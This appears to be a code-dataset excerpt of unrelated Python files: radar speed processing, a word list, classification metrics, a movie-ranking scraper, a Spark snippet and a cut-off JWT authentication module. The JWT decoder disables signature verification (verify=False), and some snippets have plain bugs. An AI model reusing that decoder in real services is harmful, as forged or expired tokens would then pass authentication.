mph)\ndef main():\n args = et.utils.ExampleArgumentParser(num_sens=1).parse_args()\n et.utils.config_logging(args)\n\n port = args.serial_port or et.utils.autodetect_serial_port()\n client = et.UARTClient(port)\n\n sensor_config = get_sensor_config()\n write_configs(sensor_config)\n \n processing_config = get_processing_config()\n sensor_config.sensor = args.sensors\n\n session_info = client.setup_session(sensor_config)\n\n pg_updater = PGUpdater(sensor_config, processing_config, session_info)\n pg_process = et.PGProcess(pg_updater)\n pg_process.start()\n\n client.start_session()\n\n interrupt_handler = et.utils.ExampleInterruptHandler()\n print(\"Press Ctrl-C to end session\")\n\n processor = Processor(sensor_config, processing_config, session_info)\n\n dataPoint_v_arr = []\n \n while not interrupt_handler.got_signal:\n info, data = client.get_next()\n \n plot_data = processor.process(data, info)\n #vel_history är en lista över de senast uppmätta hastigheterna\n #vel är endast maxhastigheten från de senast uppmätta hastigheterna\n # vel = output_vel = np.nanmax(self.est_vel_history) (Processor.process)\n \n history = plot_data[\"vel_history\"]\n for i in history:\n \n if np.isnan(i):\n i = 0\n dataPoint_v_arr.append([i]) \n \n \n if plot_data is not None:\n try:\n pg_process.put_data(plot_data)\n except et.PGProccessDiedException:\n break\n \n\n \n print(\"\\n Disconnecting...\")\n print(\"Goodbye!\")\n pg_process.close()\n client.disconnect()\n \n \n write_velocity(dataPoint_v_arr)\n\ndef get_sensor_config():\n config = et.configs.SparseServiceConfig()\n config.profile = et.configs.SparseServiceConfig.Profile.PROFILE_5\n config.sampling_mode = et.configs.SparseServiceConfig.SamplingMode.A\n config.range_interval = [0.7, 1]\n config.downsampling_factor = 3\n config.sweeps_per_frame = 512\n config.hw_accelerated_average_samples = 30\n # Frame update rate? \n return config\n\ndef write_velocity(vels):\n # TODO - change name to speed!\n \n with open('velocity_values.csv', 'w', newline = '') as csvfile:\n my_writer = csv.writer(csvfile)\n my_writer.writerows(vels)\n \n\ndef write_configs(conf):\n \n\n # Sensor config\n config_data = [\n \n ['Profile', conf.profile],\n ['Range Interval', str(conf.range_interval[0]) + \"-\" + str(conf.range_interval[1])],\n ['Sweeps per frame', conf.sweeps_per_frame],\n ['Accelerated average samples', conf.hw_accelerated_average_samples]\n ]\n\n with open('sensor_conf.csv', 'w', newline = '') as csvfile:\n my_writer = csv.writer(csvfile)\n my_writer.writerows(config_data)\n \n\nclass ProcessingConfiguration(et.configbase.ProcessingConfig):\n VERSION = 6\n\n class SpeedUnit(Enum):\n METER_PER_SECOND = (\"m/s\", 1)\n KILOMETERS_PER_HOUR = (\"km/h\", 3.6)\n MILES_PER_HOUR = (\"mph\", 2.237)\n\n @property\n def label(self):\n return self.value[0]\n\n @property\n def scale(self):\n return self.value[1]\n\n class ProcessingMethod(Enum):\n WELCH = \"Welch\"\n BARTLETT = \"Bartlett\"\n\n threshold = et.configbase.FloatParameter(\n label=\"Threshold\",\n default_value=4.0,\n limits=(1, 100),\n decimals=2,\n updateable=True,\n logscale=True,\n order=0,\n )\n\n min_speed = et.configbase.FloatParameter(\n label=\"Minimum speed\",\n unit=\"m/s\",\n default_value=0.5,\n limits=(0, 5),\n decimals=1,\n updateable=True,\n order=10,\n )\n\n fft_oversampling_factor = et.configbase.IntParameter(\n label=\"FFT oversampling factor\",\n default_value=1,\n valid_values=[1, 2, 4, 8],\n updateable=False,\n order=11,\n )\n\n processing_method = et.configbase.EnumParameter(\n label=\"Processing method\",\n default_value=ProcessingMethod.WELCH,\n enum=ProcessingMethod,\n updateable=False,\n help=(\n \"In Welch's method the segments overlap 50% and the periodograms are \"\n \"windowed using a Hann window.\"\n \"\\nIn Bartlett's method there is no overlap between segments \"\n \"and the periodograms are not modified.\"\n \"\\nWelch's method will result in lower variance and added complexity\"\n \"compared to Bartlett's method.\"\n ),\n order=12,\n )\n\n num_segments = et.configbase.IntParameter(\n label=\"Number of segments\",\n default_value=3,\n limits=(1, None),\n updateable=False,\n help=(\n \"Number of segments determines how many segments \"\n \"the signal will be divided into when using Welch's/Bartlett's method.\"\n ),\n order=13,\n )\n\n shown_speed_unit = et.configbase.EnumParameter(\n label=\"Speed unit\",\n default_value=SpeedUnit.MILES_PER_HOUR,\n enum=SpeedUnit,\n updateable=True,\n order=100,\n )\n\n show_data_plot = et.configbase.BoolParameter(\n label=\"Show data\",\n default_value=False,\n updateable=True,\n order=110,\n )\n\n show_sd_plot = et.configbase.BoolParameter(\n label=\"Show spectral density\",\n default_value=True,\n updateable=True,\n order=120,\n )\n\n show_vel_history_plot = et.configbase.BoolParameter(\n label=\"Show speed history\",\n default_value=True,\n updateable=True,\n order=130,\n )\n\n num_shown_sequences = et.configbase.IntParameter(\n label=\"Number of history bars\",\n default_value=10,\n limits=(1, NUM_SAVED_SEQUENCES),\n updateable=True,\n order=150,\n )\n\n def check(self):\n alerts = []\n\n if self.processing_method == self.ProcessingMethod.WELCH and self.num_segments % 2 != 1:\n alerts.append(et.configbase.Error(\"num_segments\", \"Number of segments must be odd\"))\n\n if self.processing_method == self.ProcessingMethod.BARTLETT and self.num_segments % 2 != 0:\n alerts.append(et.configbase.Error(\"num_segments\", \"Number of segments must be even\"))\n\n return alerts\n\n def check_sensor_config(self, sensor_config):\n alerts = {\n \"processing\": [],\n \"sensor\": [],\n }\n\n if self.processing_method == ProcessingConfiguration.ProcessingMethod.WELCH:\n # Overlap is 50% of the segment size\n segment_length = 2 * sensor_config.sweeps_per_frame // (self.num_segments + 1)\n else:\n segment_length = sensor_config.sweeps_per_frame // self.num_segments\n\n if 0 <= segment_length < 8:\n alerts[\"processing\"].append(\n et.configbase.Error(\n \"num_segments\",\n (\n \"Number of points in segment is too small.\"\n \"\\nDecrease number of segments\"\n \"\\nor increase number of sweeps per frame\"\n ),\n )\n )\n\n if (sensor_config.sweeps_per_frame & (sensor_config.sweeps_per_frame - 1)) != 0:\n lower = 2 ** int(np.floor(np.log2(sensor_config.sweeps_per_frame)))\n upper = 2 ** int(np.ceil(np.log2(sensor_config.sweeps_per_frame)))\n alerts[\"sensor\"].append(\n et.configbase.Error(\n \"sweeps_per_frame\",\n (\n \"Must have a value that is a power of 2.\"\n \"\\nClosest values are {} and {}\".format(lower, upper)\n ),\n )\n )\n\n return alerts\n\n\nget_processing_config = ProcessingConfiguration\n\n\nclass Processor:\n def __init__(self, sensor_config, processing_config, session_info):\n self.sweeps_per_frame = sensor_config.sweeps_per_frame\n sweep_rate = session_info[\"sweep_rate\"]\n est_frame_rate = sweep_rate / self.sweeps_per_frame\n self.depths = et.utils.get_range_depths(sensor_config, session_info)\n\n if processing_config.processing_method == ProcessingConfiguration.ProcessingMethod.WELCH:\n segment_length = 2 * self.sweeps_per_frame // (processing_config.num_segments + 1)\n else:\n segment_length = self.sweeps_per_frame // processing_config.num_segments\n\n self.fft_length = segment_length * processing_config.fft_oversampling_factor\n self.num_noise_est_bins = 3\n noise_est_tc = 1.0\n\n self.sequence_timeout_count = int(round(est_frame_rate * SEQUENCE_TIMEOUT_LENGTH))\n est_vel_history_size = int(round(est_frame_rate * EST_VEL_HISTORY_LENGTH))\n sd_history_size = int(round(est_frame_rate * SD_HISTORY_LENGTH))\n self.noise_est_sf = self.tc_to_sf(noise_est_tc, est_frame_rate)\n self.bin_fs = np.fft.rfftfreq(self.fft_length) * sweep_rate\n self.bin_vs = self.bin_fs * HALF_WAVELENGTH\n\n num_bins = self.bin_fs.size\n self.nasd_history = np.zeros([sd_history_size, num_bins])\n self.est_vel_history = np.full(est_vel_history_size, np.nan)\n self.belongs_to_last_sequence = np.zeros(est_vel_history_size, dtype=bool)\n self.noise_est = 0\n self.current_sequence_idle = self.sequence_timeout_count + 1\n self.sequence_vels = np.zeros(NUM_SAVED_SEQUENCES)\n self.update_idx = 0\n\n self.num_segments = processing_config.num_segments\n self.processing_method = processing_config.processing_method\n\n self.update_processing_config(processing_config)\n\n def update_processing_config(self, processing_config):\n self.min_speed = processing_config.min_speed\n self.threshold = processing_config.threshold\n\n def tc_to_sf(self, tc, fs):\n if tc <= 0.0:\n return 0.0\n\n return np.exp(-1.0 / (tc * fs))\n\n def dynamic_sf(self, static_sf):\n return min(static_sf, 1.0 - 1.0 / (1.0 + self.update_idx))\n\n def process(self, data, data_info=None):\n if data_info is None:\n warnings.warn(\n \"To leave out data_info or set to None is deprecated\",\n DeprecationWarning,\n stacklevel=2,\n )\n\n frame = data\n\n # Basic speed estimate using Welch's method\n\n zero_mean_frame = frame - frame.mean(axis=0, keepdims=True)\n psd_length = self.fft_length // 2 + 1\n\n if self.processing_method == ProcessingConfiguration.ProcessingMethod.WELCH:\n # Overlap is 50% of the segment size\n segment_length = 2 * self.sweeps_per_frame // (self.num_segments + 1)\n else:\n segment_length = self.sweeps_per_frame // self.num_segments\n\n window = hann(segment_length, sym=False)\n window_norm = np.sum(window ** 2)\n\n fft_segments = np.empty((self.num_segments, psd_length, len(self.depths)))\n\n for i in range(self.num_segments):\n if self.processing_method == ProcessingConfiguration.ProcessingMethod.WELCH:\n offset_segment = i * segment_length // 2\n else:\n offset_segment = i * segment_length\n\n current_segment = zero_mean_frame[offset_segment : offset_segment + segment_length]\n\n if self.processing_method == ProcessingConfiguration.ProcessingMethod.WELCH:\n current_segment = current_segment * window[:, None]\n\n fft_segments[i] = (\n np.square(\n np.abs(\n np.fft.rfft(\n current_segment,\n self.fft_length,\n axis=0,\n )\n )\n )\n / window_norm\n ) # rfft automatically pads if n self.threshold\n est_idx = np.where(over)[0][-1] if np.any(over) else np.nan\n\n if est_idx > 0: # evaluates to false if nan\n est_vel = self.bin_vs[est_idx]\n else:\n est_vel = np.nan\n\n if est_vel < self.min_speed: # evaluates to false if nan\n est_vel = np.nan\n\n # Sequence\n\n self.belongs_to_last_sequence = np.roll(self.belongs_to_last_sequence, -1)\n\n if np.isnan(est_vel):\n self.current_sequence_idle += 1\n else:\n if self.current_sequence_idle > self.sequence_timeout_count:\n self.sequence_vels = np.roll(self.sequence_vels, -1)\n self.sequence_vels[-1] = est_vel\n self.belongs_to_last_sequence[:] = False\n\n self.current_sequence_idle = 0\n self.belongs_to_last_sequence[-1] = True\n\n if est_vel > self.sequence_vels[-1]:\n self.sequence_vels[-1] = est_vel\n\n # Data for plots\n\n self.est_vel_history = np.roll(self.est_vel_history, -1, axis=0)\n self.est_vel_history[-1] = est_vel\n\n if np.all(np.isnan(self.est_vel_history)):\n output_vel = None\n else:\n output_vel = np.nanmax(self.est_vel_history)\n\n self.nasd_history = np.roll(self.nasd_history, -1, axis=0)\n self.nasd_history[-1] = nasd\n\n nasd_temporal_max = np.max(self.nasd_history, axis=0)\n\n temporal_max_threshold = self.threshold \n\n self.update_idx += 1\n \n return {\n \"frame\": frame,\n \"nasd\": nasd,\n \"nasd_temporal_max\": nasd_temporal_max,\n \"temporal_max_threshold\": temporal_max_threshold,\n \"vel_history\": self.est_vel_history,\n \"vel\": output_vel,\n \"sequence_vels\": self.sequence_vels,\n \"belongs_to_last_sequence\": self.belongs_to_last_sequence,\n }\n\n\nclass PGUpdater:\n def __init__(self, sensor_config, processing_config, session_info):\n self.processing_config = processing_config\n\n self.sweeps_per_frame = sensor_config.sweeps_per_frame\n self.sweep_rate = session_info[\"sweep_rate\"]\n self.depths = et.utils.get_range_depths(sensor_config, session_info)\n self.num_depths = self.depths.size\n self.est_update_rate = self.sweep_rate / self.sweeps_per_frame\n\n self.num_shown_sequences = processing_config.num_shown_sequences\n\n if (\n self.processing_config.processing_method\n == ProcessingConfiguration.ProcessingMethod.WELCH\n ):\n segment_length = 2 * self.sweeps_per_frame // (processing_config.num_segments + 1)\n else:\n segment_length = self.sweeps_per_frame // processing_config.num_segments\n\n fft_length = segment_length * processing_config.fft_oversampling_factor\n self.bin_vs = np.fft.rfftfreq(fft_length) * self.sweep_rate * HALF_WAVELENGTH\n self.dt = 1.0 / self.est_update_rate\n\n self.setup_is_done = False\n\n def setup(self, win):\n # Data plots\n\n self.data_plots = []\n self.data_curves = []\n for i in range(self.num_depths):\n title = \"{:.0f} cm\".format(100 * self.depths[i])\n plot = win.addPlot(row=0, col=i, title=title)\n plot.setMenuEnabled(False)\n plot.setMouseEnabled(x=False, y=False)\n plot.hideButtons()\n plot.showGrid(x=True, y=True)\n plot.setYRange(0, 2 ** 16)\n plot.hideAxis(\"left\")\n plot.hideAxis(\"bottom\")\n plot.plot(np.arange(self.sweeps_per_frame), 2 ** 15 * np.ones(self.sweeps_per_frame))\n curve = plot.plot(pen=et.utils.pg_pen_cycler())\n self.data_plots.append(plot)\n self.data_curves.append(curve)\n\n # Spectral density plot\n\n self.sd_plot = win.addPlot(row=1, col=0, colspan=self.num_depths)\n self.sd_plot.setMenuEnabled(False)\n self.sd_plot.setMouseEnabled(x=False, y=False)\n self.sd_plot.hideButtons()\n self.sd_plot.setLabel(\"left\", \"Normalized PSD (dB)\")\n self.sd_plot.showGrid(x=True, y=True)\n self.sd_curve = self.sd_plot.plot(pen=et.utils.pg_pen_cycler())\n dashed_pen = pg.mkPen(\"k\", width=2, style=QtCore.Qt.DashLine)\n self.sd_threshold_line = pg.InfiniteLine(angle=0, pen=dashed_pen)\n self.sd_plot.addItem(self.sd_threshold_line)\n\n self.smooth_max = et.utils.SmoothMax(\n self.est_update_rate,\n tau_decay=0.5,\n tau_grow=0,\n hysteresis=0.2,\n )\n\n # Rolling speed plot\n\n self.vel_plot = pg.PlotItem()\n self.vel_plot.setMenuEnabled(False)\n self.vel_plot.setMouseEnabled(x=False, y=False)\n self.vel_plot.hideButtons()\n self.vel_plot.setLabel(\"bottom\", \"Time (s)\")\n self.vel_plot.showGrid(x=True, y=True)\n self.vel_plot.setXRange(-EST_VEL_HISTORY_LENGTH, 0)\n self.vel_max_line = pg.InfiniteLine(angle=0, pen=pg.mkPen(\"k\", width=1))\n self.vel_plot.addItem(self.vel_max_line)\n self.vel_scatter = pg.ScatterPlotItem(size=8)\n self.vel_plot.addItem(self.vel_scatter)\n\n self.vel_html_fmt = '{:.1f} {}'\n self.vel_text_item = pg.TextItem(anchor=(0.5, 0))\n self.vel_plot.addItem(self.vel_text_item)\n\n # Sequence speed plot\n\n self.sequences_plot = pg.PlotItem()\n self.sequences_plot.setMenuEnabled(False)\n self.sequences_plot.setMouseEnabled(x=False, y=False)\n self.sequences_plot.hideButtons()\n self.sequences_plot.setLabel(\"bottom\", \"History\")\n self.sequences_plot.showGrid(y=True)\n self.sequences_plot.setXRange(-self.num_shown_sequences + 0.5, 0.5)\n tmp = np.flip(np.arange(NUM_SAVED_SEQUENCES) == 0)\n brushes = [pg.mkBrush(et.utils.color_cycler(n)) for n in tmp]\n self.bar_graph = pg.BarGraphItem(\n x=np.arange(-NUM_SAVED_SEQUENCES, 0) + 1,\n height=np.zeros(NUM_SAVED_SEQUENCES),\n width=0.8,\n brushes=brushes,\n )\n self.sequences_plot.addItem(self.bar_graph)\n\n self.sequences_text_item = pg.TextItem(anchor=(0.5, 0))\n self.sequences_plot.addItem(self.sequences_text_item)\n\n sublayout = win.addLayout(row=2, col=0, colspan=self.num_depths)\n sublayout.addItem(self.vel_plot, col=0)\n sublayout.addItem(self.sequences_plot, col=1)\n\n self.setup_is_done = True\n self.update_processing_config()\n\n def update_processing_config(self, processing_config=None):\n if processing_config is None:\n processing_config = self.processing_config\n else:\n self.processing_config = processing_config\n\n if not self.setup_is_done:\n return\n\n for plot in self.data_plots:\n plot.setVisible(processing_config.show_data_plot)\n\n self.sd_plot.setVisible(processing_config.show_sd_plot)\n self.vel_plot.setVisible(processing_config.show_vel_history_plot)\n\n self.unit = processing_config.shown_speed_unit\n speed_label = \"Speed ({})\".format(self.unit.label)\n self.sd_plot.setLabel(\"bottom\", speed_label)\n self.vel_plot.setLabel(\"left\", speed_label)\n self.sequences_plot.setLabel(\"left\", speed_label)\n max_vel = self.bin_vs[-1] * self.unit.scale\n self.sd_plot.setXRange(0, max_vel)\n\n self.num_shown_sequences = processing_config.num_shown_sequences\n self.sequences_plot.setXRange(-self.num_shown_sequences + 0.5, 0.5)\n\n y_max = max_vel * 1.2\n self.vel_plot.setYRange(0, y_max)\n self.sequences_plot.setYRange(0, y_max)\n self.vel_text_item.setPos(-EST_VEL_HISTORY_LENGTH / 2, y_max)\n self.sequences_text_item.setPos(-self.num_shown_sequences / 2 + 0.5, y_max)\n\n def update(self, data):\n # Data plots\n\n for i, ys in enumerate(data[\"frame\"].T):\n self.data_curves[i].setData(ys)\n\n # Spectral density plot\n\n psd_db = 20 * np.log10(data[\"nasd_temporal_max\"])\n psd_threshold_db = 10 * np.log10(data[\"temporal_max_threshold\"]) \n m = self.smooth_max.update(max(2 * psd_threshold_db, np.max(psd_db)))\n self.sd_plot.setYRange(0, m)\n self.sd_curve.setData(self.bin_vs * self.unit.scale, psd_db)\n self.sd_threshold_line.setPos(psd_threshold_db)\n\n # Rolling speed plot\n\n vs = data[\"vel_history\"] * self.unit.scale\n mask = ~np.isnan(vs)\n ts = -np.flip(np.arange(vs.size)) * self.dt\n bs = data[\"belongs_to_last_sequence\"]\n brushes = [et.utils.pg_brush_cycler(int(b)) for b in bs[mask]]\n\n self.vel_scatter.setData(ts[mask], vs[mask], brush=brushes)\n\n v = data[\"vel\"]\n if v:\n html = self.vel_html_fmt.format(v * self.unit.scale, self.unit.label)\n self.vel_text_item.setHtml(html)\n self.vel_text_item.show()\n\n self.vel_max_line.setPos(v * self.unit.scale)\n self.vel_max_line.show()\n else:\n self.vel_text_item.hide()\n self.vel_max_line.hide()\n\n # Sequence speed plot\n\n hs = data[\"sequence_vels\"] * self.unit.scale\n self.bar_graph.setOpts(height=hs)\n\n if hs[-1] > 1e-3:\n html = self.vel_html_fmt.format(hs[-1], self.unit.label)\n self.sequences_text_item.setHtml(html)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Code_Draft.py","file_name":"Code_Draft.py","file_ext":"py","file_size_in_byte":22493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"152505688","text":"list_of_words = ['drill', 'waste', 'build', 'elbow', 'glove', 'sport', 'shock',\n 'cruel', 'black', 'state', 'grind', 'shake', 'donor', 'chaos',\n 'class', 'mouth', 'feign', 'heart', 'draft', 'giant', 'waist',\n 'abbey', 'acute', 'chief', 'horse', 'bowel', 'tough', 'cable',\n 'death', 'muggy', 'point', 'fever', 'front', 'chain', 'adopt',\n 'brand', 'steak', 'enjoy', 'swipe', 'blade', 'space', 'arrow',\n 'owner', 'stain', 'weave', 'force', 'blame', 'coach', 'jelly',\n 'pluck', 'small', 'green', 'terms', 'upset', 'ideal', 'ivory',\n 'summit', 'dealer', 'string', 'pillow', 'couple', 'earwax', 'locate',\n 'assume', 'option', 'desire', 'decade', 'advice', 'senior', 'leader',\n 'timber', 'cheque', 'banner', 'treaty', 'credit', 'reduce', 'coffee',\n 'effort', 'belong', 'change', 'patent', 'monkey', 'survey', 'gravel',\n 'budget', 'system', 'embryo', 'charge', 'cheese', 'tender', 'mother',\n 'resign', 'prison', 'appeal', 'aspect', 'favour', 'freeze', 'button',\n 'bubble', 'jacket', 'square', 'thrust', 'lounge', 'runner', 'switch',\n 'gift', 'code', 'core', 'wire', 'loss', 'slab', 'slam', 'sell', 'bell',\n 'sofa', 'bite', 'miss', 'cane', 'pull', 'knee', 'post', 'iron', 'herd',\n 'cafe', 'blue', 'wage', 'step', 'date', 'stir', 'lily', 'mind', 'jump',\n 'bind', 'even', 'area', 'pass', 'dine', 'calm', 'food', 'deck', 'safe',\n 'pray', 'echo', 'vain', 'shed', 'rank', 'pair', 'cute', 'fool', 'beef',\n 'lean', 'swim', 'well', 'menu', 'tune', 'slot', 'plot', 'knot', 'yard']\n","sub_path":"PROJECT 2/words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"392859400","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 25 10:44:24 2020\n\n@author: nasmadasser\n\"\"\"\n\nimport numpy as np \nimport matplotlib.pyplot as plt\n\ndef confusion_matrix(true, predicted):\n # set the length of the matrix\n K = len(np.unique(true))+1\n # create empty matrix to fill\n matrix = np.zeros((K,K))\n \n # count labels \n for a, p in zip(true, predicted):\n matrix[a][p] +=1\n \n return matrix[1:K,1:K]\n\n\ndef plot_confusion_matrix(cm, title= 'Confusion matrix', cmap=plt.cm.winter_r):\n plt.figure(figsize=(15,15)) \n plt.matshow(cm, cmap=cmap) # imshow\n plt.colorbar()\n plt.xlabel('predicted room')\n plt.ylabel('actual room')\n plt.tight_layout()\n \n height, width = cm.shape\n for x in range (width):\n for y in range (height):\n plt.annotate(str(cm[x][y]), xy=(y,x), ha='center', va='center')\n plt.show()\n\ndef accuracy(true, predicted):\n return (true == predicted).sum()/float(len(true))\n\ndef precision(room, cm):\n # precision = TP / (TP+FP)\n column = cm[:,room]\n return cm[room,room]/column.sum()\n\ndef recall(room, cm):\n # recall = TP/ (FN+TP)\n row= cm[room,:]\n return cm[room,room]/row.sum()\n\ndef precision_total(cm):\n rows, columns = cm.shape\n precisions =0\n for room in range(rows):\n precisions +=precision(room, cm)\n return precisions/rows\n\ndef recall_total(cm):\n rows, columns = cm.shape\n recalls=0\n for room in range(columns):\n recalls += recall(room, cm)\n return recalls/columns\n\ndef cm_precision_recall_accuracy_F1(y_test, predicted, cm, by_room):\n precision =precision_total(cm)\n recall = recall_total(cm)\n accura = accuracy(y_test, predicted)\n F1 = 2*(precision*recall)/(precision+recall) \n if by_room is True:\n print('\\nPrediction by room \\n', \" Room Precision Recall\")\n for room in range(4):\n print(f\"{room:5d} {precision:9.3f} {recall:6.3f}\")\n \n print ('\\nTotal precision', \"{:.3%}\".format(precision))\n print ('Total recall', \"{:.3%}\".format(recall))\n print('Total accuracy',\"{:.3%}\".format(accura))\n print('F1 score',\"{:.3%}\".format(F1))\n \n return precision, recall, accura, F1\n \n","sub_path":"src/legacy/metrics_nasma.py","file_name":"metrics_nasma.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"27068638","text":"import json\nimport sqlite3\nimport requests\nfrom multiprocessing import Pool\nfrom requests.exceptions import RequestException\nfrom bs4 import BeautifulSoup\n\nheaders = {\n 'Accept': '*/*',\n 'Accept-Encoding': 'gzip, deflate',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.1 Safari/605.1.15',\n 'Accept-Language': 'zh-cn'\n}\n\n\ndef create_table():\n conn = sqlite3.connect('maoyan.db')\n cursor = conn.cursor()\n try:\n cursor.execute('''create table if not exists top100\n (ranking integer ,\n image varchar(100),\n title varchar(100),\n actor varchar (100),\n time varchar (100),\n score float \n );\n ''')\n except sqlite3.OperationalError:\n return None\n cursor.close()\n conn.commit()\n conn.close()\n\n\ndef insert_to_top100(insert_data):\n conn = sqlite3.connect('maoyan.db')\n cursor = conn.cursor()\n try:\n cursor.execute('''\n insert into top100 \n (ranking, image, title, actor, time, score) \n values (?, ?, ?, ?, ?, ?)\n ''', (\n insert_data['ranking'],\n insert_data['image'],\n insert_data['title'],\n insert_data['actor'],\n insert_data['time'],\n insert_data['score']\n ))\n print(cursor.rowcount)\n except sqlite3.Error:\n return None\n cursor.close()\n conn.commit()\n conn.close()\n\n\ndef get_one_page(url):\n response = requests.get(url, headers=headers)\n try:\n if response.status_code == 200:\n return response.text\n return None\n except RequestException:\n return None\n\n\ndef parse_one_page(html):\n soup = BeautifulSoup(html, 'lxml')\n wrapper = soup.find('dl', class_='board-wrapper').find_all('dd')\n print(wrapper)\n for item in wrapper:\n yield {\n 'ranking': int(item.find('i', class_='board-index').string),\n 'image': item.find('img', class_='board-img')['data-src'],\n 'title': item.find('p', class_='name').string,\n 'actor': item.find('p', class_='star').string.strip()[3:],\n 'time': item.find('p', class_='releasetime').string.strip()[5:],\n 'score': float(item.find('p', class_='score').get_text())\n }\n\n\ndef write_to_file(content):\n with open('maoyan-top100.txt', 'a', encoding='utf-8') as file:\n file.write(json.dumps(content, ensure_ascii=False) + '\\n')\n\n\ndef main(offset):\n page_url = 'http://maoyan.com/board/4?offset=' + str(offset)\n print(page_url)\n html = get_one_page(page_url)\n for item in parse_one_page(html):\n print(item)\n write_to_file(item)\n insert_to_top100(item)\n\n\nif __name__ == '__main__':\n create_table()\n pool = Pool()\n pool.map(main, [i * 10 for i in range(10)])\n","sub_path":"maoyan-top100/maoyan-top100.py","file_name":"maoyan-top100.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"14242378","text":"# -*- coding: UTF-8 -*-\n'''\n@author: Andrewzhj\n@contact: andrew_zhj@126.com\n@file: ml-3.py\n@time: 2018/7/23 18:15\n@desc:\n@note:\n'''\nimport matplotlib\nfrom pyspark.sql import SparkSession\nspark = SparkSession\\\n .builder\\\n .appName(\"PythonWordCount\")\\\n .getOrCreate()\n\nuser_data = sc.textFile(\"/tmp/ml-100k/u.user\")\n# user_data=spark.read.text(\"/tmp/ml-100k/u.user\")\nuser_data.first()\nuser_fields = user_data.map(lambda line: line.split(\"|\"))\nnum_users = user_fields.map(lambda fields: fields[0]).count()\nnum_genders = user_fields.map(lambda fields: fields[2]).distinct().count()\nnum_occupations = user_fields.map(lambda fields: fields[3]).distinct().count()\nnum_zipcodes = user_fields.map(lambda fields: fields[4]).distinct().count()\n\nprint(\"Users: %d, Genders: %d, Occupations: %d, ZIP codes: %d\"\n %(num_users, num_genders, num_occupations, num_zipcodes))\n\n\nages = user_fields.map(lambda x: int(x[1])).collect()\nhist(ages, bins=20, color='lightblue', normal=True)\nfig = matplotlib.pyplot.gcf()\nfig.set_size_inches(16, 10)","sub_path":"spark-task/ml-3.py","file_name":"ml-3.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268446547","text":"gl_num = 10\ngl_title = \"黑骏马\"\ngl_name = \"小名\"\ndef demo():\n\n # num = 99\n print(\"%d\" % gl_num)\n print(\"%s\" % gl_title)\n print(\"%s\" % gl_name)\n\n# title = \"黑骏马\"\n\ndemo()\n# name = \"小名\"","sub_path":"视频学习/基础班/07_语法进阶/hm_07_全局变量命名.py","file_name":"hm_07_全局变量命名.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"7803849","text":"import jwt\nimport datetime\nfrom ns_portal.database.main_db import (\n TInstance,\n TApplications,\n TAutorisations,\n TUsers,\n TRoles,\n TSite\n)\nfrom ns_portal.utils.utils import (\n my_get_authentication_policy\n)\n\n# we follow the RFC7519\n# look at https://tools.ietf.org/html/rfc7519#section-4.1\n# for all definitions\n_seconde = 1\n_minuteInSec = 60 * _seconde\n_hoursInSec = 60 * _minuteInSec\n\n_cookieTokenExpInSec = 24 * _hoursInSec\n_codeTokenExpInSec = 5\n_accessTokenExpInSec = 5 * _minuteInSec\n_refreshTokenExpInSec = 24 * _hoursInSec\n\n\ndef myEncode(payload, secret, algorithm):\n return jwt.encode(payload, secret, algorithm=algorithm)\n\n\ndef myDecode(token, secret):\n payloadValided = False\n try:\n payloadValided = jwt.decode(\n token,\n secret,\n algorithms=['HS256', 'HS512'],\n verify=False\n )\n except jwt.ExpiredSignatureError:\n raise jwt.ExpiredSignatureError(\n 'You take too much time for getting your token.',\n 'You need to login again'\n )\n except jwt.InvalidTokenError:\n raise jwt.InvalidTokenError(\n 'Exception when decode()'\n )\n except jwt.DecodeError:\n raise jwt.DecodeError(\n 'We canno\\'t decode your token'\n )\n except jwt.InvalidSignatureError:\n raise jwt.InvalidSignatureError(\n 'Your token’s signature doesn’t match'\n ' the one provided as part of the token'\n )\n return payloadValided\n\n\ndef getSecretAndAlgorithFromPolicy(request, tokenKey, algoKey):\n policy = my_get_authentication_policy(request)\n secret = getattr(policy, tokenKey)\n algorithm = getattr(policy, algoKey)\n\n return (secret, algorithm)\n\n\ndef getCookieToken(idUser, request):\n secret, algorithm = getSecretAndAlgorithFromPolicy(\n request=request,\n tokenKey='cookieTokenSecret',\n algoKey='cookieTokenAlgorithm'\n )\n\n payload = buildPayload(\n idUser=idUser,\n request=request,\n timeAddForExp=_cookieTokenExpInSec\n )\n\n return myEncode(payload, secret, algorithm)\n\n\ndef getCodeToken(idUser, request):\n secret, algorithm = getSecretAndAlgorithFromPolicy(\n request=request,\n tokenKey='codeTokenSecret',\n algoKey='codeTokenAlgorithm'\n )\n\n now = datetime.datetime.now()\n nowInTimeStampSeconds = int(now.timestamp())\n\n payload = {\n 'sub': str(idUser),\n 'exp': nowInTimeStampSeconds + _codeTokenExpInSec\n }\n\n return myEncode(payload, secret, algorithm=algorithm)\n\n\ndef buildPayload(idUser, request, timeAddForExp):\n policy = my_get_authentication_policy(request)\n tsiteName = getattr(policy, 'TSit_Name')\n\n colsToRet = [\n TInstance.TIns_PK_ID,\n TInstance.TIns_Label,\n TInstance.TIns_ApplicationPath,\n TInstance.TIns_Theme,\n TInstance.TIns_Database,\n TInstance.TIns_Order,\n TInstance.TIns_ReadOnly,\n TApplications.TApp_ClientID,\n TApplications.TApp_Description,\n TRoles.TRol_Label,\n TUsers.TUse_PK_ID,\n TUsers.TUse_Login,\n TUsers.TUse_Language,\n TSite.TSit_Name,\n TSite.TSit_Project,\n TSite.TSit_ImagePathMainLogo,\n TSite.TSit_ImagePathMainMenu,\n TAutorisations.TUse_Observer\n ]\n\n VAllUsersApplications = request.dbsession.query(TInstance)\n 